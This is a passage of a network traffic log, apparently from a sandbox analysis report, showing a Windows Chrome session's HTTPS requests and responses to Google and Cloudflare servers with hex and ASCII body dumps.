                                                                                                                                                                                                                                  Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                                                                                                                                                                                                  Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: BBBBBBF!4I
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: $'


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  43192.168.2.1649804104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:01 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Content-Length: 7
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  cf-chl-out: NzI30uBfstlpkOjtfDiEgZwAaPYaJI6DtNg=$ofTfJ1JuuIQO1lBn
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418f3269e0c329-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                  Data Ascii: invalid


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  44192.168.2.1649801142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC1342OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 547
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  X-Goog-AuthUser: 0
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=QQynn9tS2XiLcdGYY05yl7KIJEIKLU9wN3jIcVSvYZNtR2dlvtQMBYuDCSMb-g_dI3aDOXxETqtVjjpLAb_uVefZrmOCPaEc3MLPTu71Vv24pDdyNCxx-sGwa7y16b5VbqNxnZKg4XDQeUsBwBYWPa5QxACm2LKbJ1y8xC6m0_EKGAFst39tq3ZM
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC547OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 2d 55 53 22 2c 6e 75 6c 6c 2c 22 33 38 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 33 34 35 35 30 31 33 36 33 31 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e
                                                                                                                                                                                                                                  Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en-US",null,"38",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1734550136310",null,null,n
                                                                                                                                                                                                                                  2024-12-18 19:29:02 UTC946INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                  Set-Cookie: NID=520=Bl0h4Y2jzkBqT25GAZ72dodY4ZM2sY6MYjuErn4bG-CvAGcxYYf-RJlCRybM0tK_zZvDQeH6Zl-Za4vnggf9vQ7dTPchomnX1fGyo02iN5mkfkRB7LFUT7UdCx7XK6pjdgNBHa87aBuLk6AQmkNthYd5fPrrm4xc5vmFQrdpukkQdv0ENY6r2RUSVgrOgekd; expires=Thu, 19-Jun-2025 19:29:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:02 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Expires: Wed, 18 Dec 2024 19:29:02 GMT
                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-12-18 19:29:02 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                  2024-12-18 19:29:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  45192.168.2.1649800142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC1342OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 535
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  X-Goog-AuthUser: 0
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=QQynn9tS2XiLcdGYY05yl7KIJEIKLU9wN3jIcVSvYZNtR2dlvtQMBYuDCSMb-g_dI3aDOXxETqtVjjpLAb_uVefZrmOCPaEc3MLPTu71Vv24pDdyNCxx-sGwa7y16b5VbqNxnZKg4XDQeUsBwBYWPa5QxACm2LKbJ1y8xC6m0_EKGAFst39tq3ZM
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC535OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 2d 55 53 22 2c 6e 75 6c 6c 2c 22 33 38 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 33 34 35 35 30 31 33 36 33 31 39 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e
                                                                                                                                                                                                                                  Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en-US",null,"38",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1734550136319",null,null,n
                                                                                                                                                                                                                                  2024-12-18 19:29:02 UTC946INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                  Set-Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG; expires=Thu, 19-Jun-2025 19:29:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:02 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Expires: Wed, 18 Dec 2024 19:29:02 GMT
                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-12-18 19:29:02 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                  2024-12-18 19:29:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  46192.168.2.1649803142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC579OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                  Access-Control-Request-Headers: content-encoding,content-type,x-goog-authuser
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:29:02 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web,authorization,content-encoding,content-type,x-goog-authuser,origin
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:02 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  47192.168.2.1649805172.217.19.2284436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:03 UTC644OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=QQynn9tS2XiLcdGYY05yl7KIJEIKLU9wN3jIcVSvYZNtR2dlvtQMBYuDCSMb-g_dI3aDOXxETqtVjjpLAb_uVefZrmOCPaEc3MLPTu71Vv24pDdyNCxx-sGwa7y16b5VbqNxnZKg4XDQeUsBwBYWPa5QxACm2LKbJ1y8xC6m0_EKGAFst39tq3ZM
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC705INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                  Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                  Content-Length: 5430
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:06:29 GMT
                                                                                                                                                                                                                                  Expires: Thu, 26 Dec 2024 19:06:29 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=691200
                                                                                                                                                                                                                                  Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Age: 1354
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                                                                                                  Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
                                                                                                                                                                                                                                  Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
